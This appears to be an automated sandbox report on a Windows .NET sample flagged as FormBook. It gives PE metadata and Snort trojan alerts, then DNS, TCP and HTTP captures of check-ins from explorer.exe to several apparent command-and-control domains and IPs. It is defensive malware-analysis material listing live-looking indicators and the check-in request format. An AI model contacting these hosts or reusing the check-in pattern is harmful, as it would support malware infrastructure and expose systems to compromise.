Time Stamp:	0x652CC272 [Mon Oct 16 04:56:18 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [11002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x95c59	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0xd78	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x93d88	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x93cb4	0x94000	False	0.93646240234375	data	7.947837143423425	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0xd78	0x1000	False	0.548828125	data	6.0033343187662185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0xc	0x1000	False	0.009033203125	data	0.016408464515625623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x960c8	0x9ac	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.7495961227786753
RT_GROUP_ICON	0x96a84	0x14	data	1.05
RT_VERSION	0x96aa8	0x2cc	data	0.4371508379888268

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.93.33.130.19049727802031412 10/18/23-08:37:53.415166	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49727	80	192.168.2.9	3.33.130.190
192.168.2.9198.54.117.24249721802031412 10/18/23-08:36:30.911963	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.9	198.54.117.242
192.168.2.9212.129.41.21749728802031412 10/18/23-08:38:14.037701	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49728	80	192.168.2.9	212.129.41.217
192.168.2.9104.17.157.149722802031412 10/18/23-08:36:51.901827	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49722	80	192.168.2.9	104.17.157.1
192.168.2.9108.179.194.2849725802031412 10/18/23-08:37:11.727615	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49725	80	192.168.2.9	108.179.194.28
192.168.2.9154.12.93.849726802031412 10/18/23-08:37:33.100858	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49726	80	192.168.2.9	154.12.93.8
192.168.2.938.6.237.4349717802031412 10/18/23-08:35:11.802172	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49717	80	192.168.2.9	38.6.237.43
192.168.2.966.203.148.23049719802031412 10/18/23-08:35:30.913062	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.9	66.203.148.230
192.168.2.93.33.130.19049720802031412 10/18/23-08:35:49.921130	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.9	3.33.130.190

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2023 08:35:11.628237963 CEST	49717	80	192.168.2.9	38.6.237.43
Oct 18, 2023 08:35:11.801985979 CEST	80	49717	38.6.237.43	192.168.2.9
Oct 18, 2023 08:35:11.802067041 CEST	49717	80	192.168.2.9	38.6.237.43
Oct 18, 2023 08:35:11.802171946 CEST	49717	80	192.168.2.9	38.6.237.43
Oct 18, 2023 08:35:11.976074934 CEST	80	49717	38.6.237.43	192.168.2.9
Oct 18, 2023 08:35:11.976197004 CEST	80	49717	38.6.237.43	192.168.2.9
Oct 18, 2023 08:35:11.976239920 CEST	80	49717	38.6.237.43	192.168.2.9
Oct 18, 2023 08:35:11.976337910 CEST	49717	80	192.168.2.9	38.6.237.43
Oct 18, 2023 08:35:11.976383924 CEST	49717	80	192.168.2.9	38.6.237.43
Oct 18, 2023 08:35:12.150444984 CEST	80	49717	38.6.237.43	192.168.2.9
Oct 18, 2023 08:35:30.543623924 CEST	49719	80	192.168.2.9	66.203.148.230
Oct 18, 2023 08:35:30.912692070 CEST	80	49719	66.203.148.230	192.168.2.9
Oct 18, 2023 08:35:30.912959099 CEST	49719	80	192.168.2.9	66.203.148.230
Oct 18, 2023 08:35:30.913062096 CEST	49719	80	192.168.2.9	66.203.148.230
Oct 18, 2023 08:35:31.281985044 CEST	80	49719	66.203.148.230	192.168.2.9
Oct 18, 2023 08:35:31.282124996 CEST	80	49719	66.203.148.230	192.168.2.9
Oct 18, 2023 08:35:31.282141924 CEST	80	49719	66.203.148.230	192.168.2.9
Oct 18, 2023 08:35:31.282340050 CEST	49719	80	192.168.2.9	66.203.148.230
Oct 18, 2023 08:35:31.282499075 CEST	49719	80	192.168.2.9	66.203.148.230
Oct 18, 2023 08:35:31.651437044 CEST	80	49719	66.203.148.230	192.168.2.9
Oct 18, 2023 08:35:49.761018038 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:49.920888901 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:35:49.921026945 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:49.921129942 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:50.080923080 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:35:50.149503946 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:35:50.149568081 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:35:50.149651051 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:50.149705887 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:50.164112091 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:35:50.164295912 CEST	49720	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:35:50.309505939 CEST	80	49720	3.33.130.190	192.168.2.9
Oct 18, 2023 08:36:30.740056038 CEST	49721	80	192.168.2.9	198.54.117.242
Oct 18, 2023 08:36:30.911557913 CEST	80	49721	198.54.117.242	192.168.2.9
Oct 18, 2023 08:36:30.911962986 CEST	49721	80	192.168.2.9	198.54.117.242
Oct 18, 2023 08:36:30.911962986 CEST	49721	80	192.168.2.9	198.54.117.242
Oct 18, 2023 08:36:31.080696106 CEST	80	49721	198.54.117.242	192.168.2.9
Oct 18, 2023 08:36:31.080720901 CEST	80	49721	198.54.117.242	192.168.2.9
Oct 18, 2023 08:36:51.540854931 CEST	49722	80	192.168.2.9	104.17.157.1
Oct 18, 2023 08:36:51.693906069 CEST	80	49722	104.17.157.1	192.168.2.9
Oct 18, 2023 08:36:51.694014072 CEST	49722	80	192.168.2.9	104.17.157.1
Oct 18, 2023 08:36:51.901827097 CEST	49722	80	192.168.2.9	104.17.157.1
Oct 18, 2023 08:36:52.054624081 CEST	80	49722	104.17.157.1	192.168.2.9
Oct 18, 2023 08:36:52.057290077 CEST	80	49722	104.17.157.1	192.168.2.9
Oct 18, 2023 08:36:52.057754040 CEST	80	49722	104.17.157.1	192.168.2.9
Oct 18, 2023 08:36:52.057928085 CEST	49722	80	192.168.2.9	104.17.157.1
Oct 18, 2023 08:36:52.078474998 CEST	49722	80	192.168.2.9	104.17.157.1
Oct 18, 2023 08:36:52.231267929 CEST	80	49722	104.17.157.1	192.168.2.9
Oct 18, 2023 08:37:11.525259018 CEST	49725	80	192.168.2.9	108.179.194.28
Oct 18, 2023 08:37:11.723123074 CEST	80	49725	108.179.194.28	192.168.2.9
Oct 18, 2023 08:37:11.723248959 CEST	49725	80	192.168.2.9	108.179.194.28
Oct 18, 2023 08:37:11.727615118 CEST	49725	80	192.168.2.9	108.179.194.28
Oct 18, 2023 08:37:11.925134897 CEST	80	49725	108.179.194.28	192.168.2.9
Oct 18, 2023 08:37:11.930295944 CEST	80	49725	108.179.194.28	192.168.2.9
Oct 18, 2023 08:37:11.930413961 CEST	80	49725	108.179.194.28	192.168.2.9
Oct 18, 2023 08:37:11.930474043 CEST	49725	80	192.168.2.9	108.179.194.28
Oct 18, 2023 08:37:11.932235956 CEST	49725	80	192.168.2.9	108.179.194.28
Oct 18, 2023 08:37:12.128024101 CEST	80	49725	108.179.194.28	192.168.2.9
Oct 18, 2023 08:37:32.937622070 CEST	49726	80	192.168.2.9	154.12.93.8
Oct 18, 2023 08:37:33.099327087 CEST	80	49726	154.12.93.8	192.168.2.9
Oct 18, 2023 08:37:33.099486113 CEST	49726	80	192.168.2.9	154.12.93.8
Oct 18, 2023 08:37:33.100857973 CEST	49726	80	192.168.2.9	154.12.93.8
Oct 18, 2023 08:37:33.261871099 CEST	80	49726	154.12.93.8	192.168.2.9
Oct 18, 2023 08:37:33.263673067 CEST	80	49726	154.12.93.8	192.168.2.9
Oct 18, 2023 08:37:33.263685942 CEST	80	49726	154.12.93.8	192.168.2.9
Oct 18, 2023 08:37:33.263910055 CEST	49726	80	192.168.2.9	154.12.93.8
Oct 18, 2023 08:37:33.263910055 CEST	49726	80	192.168.2.9	154.12.93.8
Oct 18, 2023 08:37:33.424102068 CEST	80	49726	154.12.93.8	192.168.2.9
Oct 18, 2023 08:37:53.255212069 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.414822102 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:37:53.414979935 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.415165901 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.574534893 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:37:53.641710043 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:37:53.641748905 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:37:53.642024040 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.642024994 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.655008078 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:37:53.655087948 CEST	49727	80	192.168.2.9	3.33.130.190
Oct 18, 2023 08:37:53.802025080 CEST	80	49727	3.33.130.190	192.168.2.9
Oct 18, 2023 08:38:13.731350899 CEST	49728	80	192.168.2.9	212.129.41.217
Oct 18, 2023 08:38:14.037312984 CEST	80	49728	212.129.41.217	192.168.2.9
Oct 18, 2023 08:38:14.037619114 CEST	49728	80	192.168.2.9	212.129.41.217
Oct 18, 2023 08:38:14.037700891 CEST	49728	80	192.168.2.9	212.129.41.217
Oct 18, 2023 08:38:14.343452930 CEST	80	49728	212.129.41.217	192.168.2.9
Oct 18, 2023 08:38:14.542393923 CEST	80	49728	212.129.41.217	192.168.2.9
Oct 18, 2023 08:38:14.542434931 CEST	80	49728	212.129.41.217	192.168.2.9
Oct 18, 2023 08:38:14.542447090 CEST	80	49728	212.129.41.217	192.168.2.9
Oct 18, 2023 08:38:14.542977095 CEST	49728	80	192.168.2.9	212.129.41.217
Oct 18, 2023 08:38:14.543783903 CEST	49728	80	192.168.2.9	212.129.41.217
Oct 18, 2023 08:38:14.849210978 CEST	80	49728	212.129.41.217	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2023 08:35:09.951937914 CEST	53806	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:35:10.965024948 CEST	53806	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:35:11.626806974 CEST	53	53806	1.1.1.1	192.168.2.9
Oct 18, 2023 08:35:11.626838923 CEST	53	53806	1.1.1.1	192.168.2.9
Oct 18, 2023 08:35:30.169152975 CEST	60661	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:35:30.541765928 CEST	53	60661	1.1.1.1	192.168.2.9
Oct 18, 2023 08:35:49.496772051 CEST	51082	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:35:49.760238886 CEST	53	51082	1.1.1.1	192.168.2.9
Oct 18, 2023 08:36:30.371794939 CEST	58449	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:36:30.737653971 CEST	53	58449	1.1.1.1	192.168.2.9
Oct 18, 2023 08:36:50.768521070 CEST	50492	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:36:51.243699074 CEST	53	50492	1.1.1.1	192.168.2.9
Oct 18, 2023 08:37:11.199851036 CEST	62592	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:37:11.523816109 CEST	53	62592	1.1.1.1	192.168.2.9
Oct 18, 2023 08:37:31.609113932 CEST	49831	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:37:32.605480909 CEST	49831	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:37:32.936103106 CEST	53	49831	1.1.1.1	192.168.2.9
Oct 18, 2023 08:37:32.936131954 CEST	53	49831	1.1.1.1	192.168.2.9
Oct 18, 2023 08:37:53.037266016 CEST	64516	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:37:53.253803968 CEST	53	64516	1.1.1.1	192.168.2.9
Oct 18, 2023 08:38:13.434632063 CEST	58533	53	192.168.2.9	1.1.1.1
Oct 18, 2023 08:38:13.729809046 CEST	53	58533	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 18, 2023 08:35:09.951937914 CEST	192.168.2.9	1.1.1.1	0xd82d	Standard query (0)	www.alivenode.com	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:10.965024948 CEST	192.168.2.9	1.1.1.1	0xd82d	Standard query (0)	www.alivenode.com	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:30.169152975 CEST	192.168.2.9	1.1.1.1	0x1c61	Standard query (0)	www.75241.shop	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:49.496772051 CEST	192.168.2.9	1.1.1.1	0xced8	Standard query (0)	www.theavenuclinic.com	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:36:30.371794939 CEST	192.168.2.9	1.1.1.1	0xa433	Standard query (0)	www.bezobotnation.net	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:36:50.768521070 CEST	192.168.2.9	1.1.1.1	0x5225	Standard query (0)	www.boat-insurance-today.world	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:11.199851036 CEST	192.168.2.9	1.1.1.1	0x8147	Standard query (0)	www.transporteturisticofradan.space	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:31.609113932 CEST	192.168.2.9	1.1.1.1	0xabd4	Standard query (0)	www.gdminsheng.icu	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:32.605480909 CEST	192.168.2.9	1.1.1.1	0xabd4	Standard query (0)	www.gdminsheng.icu	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:53.037266016 CEST	192.168.2.9	1.1.1.1	0x4157	Standard query (0)	www.dewdrop.store	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:38:13.434632063 CEST	192.168.2.9	1.1.1.1	0x9771	Standard query (0)	www.vespeciative.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 18, 2023 08:35:11.626806974 CEST	1.1.1.1	192.168.2.9	0xd82d	No error (0)	www.alivenode.com		38.6.237.43	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:11.626838923 CEST	1.1.1.1	192.168.2.9	0xd82d	No error (0)	www.alivenode.com		38.6.237.43	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:30.541765928 CEST	1.1.1.1	192.168.2.9	0x1c61	No error (0)	www.75241.shop		66.203.148.230	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:49.760238886 CEST	1.1.1.1	192.168.2.9	0xced8	No error (0)	www.theavenuclinic.com	theavenuclinic.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:35:49.760238886 CEST	1.1.1.1	192.168.2.9	0xced8	No error (0)	theavenuclinic.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:35:49.760238886 CEST	1.1.1.1	192.168.2.9	0xced8	No error (0)	theavenuclinic.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:36:30.737653971 CEST	1.1.1.1	192.168.2.9	0xa433	No error (0)	www.bezobotnation.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:36:51.243699074 CEST	1.1.1.1	192.168.2.9	0x5225	No error (0)	www.boat-insurance-today.world	ssl1.prod.systemdragon.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:36:51.243699074 CEST	1.1.1.1	192.168.2.9	0x5225	No error (0)	ssl1.prod.systemdragon.com		104.17.157.1	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:36:51.243699074 CEST	1.1.1.1	192.168.2.9	0x5225	No error (0)	ssl1.prod.systemdragon.com		104.17.158.1	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:11.523816109 CEST	1.1.1.1	192.168.2.9	0x8147	No error (0)	www.transporteturisticofradan.space	transporteturisticofradan.space		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:37:11.523816109 CEST	1.1.1.1	192.168.2.9	0x8147	No error (0)	transporteturisticofradan.space		108.179.194.28	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:32.936103106 CEST	1.1.1.1	192.168.2.9	0xabd4	No error (0)	www.gdminsheng.icu	256.93cu.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:37:32.936103106 CEST	1.1.1.1	192.168.2.9	0xabd4	No error (0)	256.93cu.com		154.12.93.8	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:32.936131954 CEST	1.1.1.1	192.168.2.9	0xabd4	No error (0)	www.gdminsheng.icu	256.93cu.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:37:32.936131954 CEST	1.1.1.1	192.168.2.9	0xabd4	No error (0)	256.93cu.com		154.12.93.8	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:53.253803968 CEST	1.1.1.1	192.168.2.9	0x4157	No error (0)	www.dewdrop.store	dewdrop.store		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:37:53.253803968 CEST	1.1.1.1	192.168.2.9	0x4157	No error (0)	dewdrop.store		3.33.130.190	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:37:53.253803968 CEST	1.1.1.1	192.168.2.9	0x4157	No error (0)	dewdrop.store		15.197.148.33	A (IP address)	IN (0x0001)	false
Oct 18, 2023 08:38:13.729809046 CEST	1.1.1.1	192.168.2.9	0x9771	No error (0)	www.vespeciative.com	vespeciative.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 18, 2023 08:38:13.729809046 CEST	1.1.1.1	192.168.2.9	0x9771	No error (0)	vespeciative.com		212.129.41.217	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.alivenode.com

www.75241.shop

www.theavenuclinic.com

www.bezobotnation.net

www.boat-insurance-today.world

www.transporteturisticofradan.space

www.gdminsheng.icu

www.dewdrop.store

www.vespeciative.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.9	49717	38.6.237.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:35:11.802171946 CEST	113	OUT	GET /ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF HTTP/1.1 Host: www.alivenode.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:35:11.976197004 CEST	113	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 18 Oct 2023 06:35:11 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.alivenode.com/ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.9	49719	66.203.148.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:35:30.913062096 CEST	117	OUT	GET /ifrg/?MZTt=xSMqd057fSXzWu5wKdtIXZUKnlhHKM2qAPBglXE71Jl6YzvFk2uUy9Mdjb2m3oopWkBZ&jlUpT=PtkH4NF HTTP/1.1 Host: www.75241.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:35:31.282124996 CEST	117	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 18 Oct 2023 06:35:31 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.9	49720	3.33.130.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:35:49.921129942 CEST	118	OUT	GET /ifrg/?MZTt=KnnTbyCCZFGMJEpTiCiYfsZf4Jee/pLZimTMLfkjlFBZ/SsdpxLlcqM/NBDR5bKLpT3z&jlUpT=PtkH4NF HTTP/1.1 Host: www.theavenuclinic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 18, 2023 08:35:50.149503946 CEST	119	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 18 Oct 2023 06:35:50 GMT Content-Type: text/html Content-Length: 291 Connection: close ETag: "65271109-123" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.9	49721	198.54.117.242	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 18, 2023 08:36:30.911962986 CEST	120	OUT	GET /ifrg/?MZTt=jWjPiyUc8jw17WMu1mlZUuydoLnX0svbNsscHdhrTlZXQKm/vCPlVUcnTHIU3rFeJjEe&jlUpT=PtkH4NF HTTP/1.1 Host: www.bezobotnation.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.9	49722	104.17.157.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
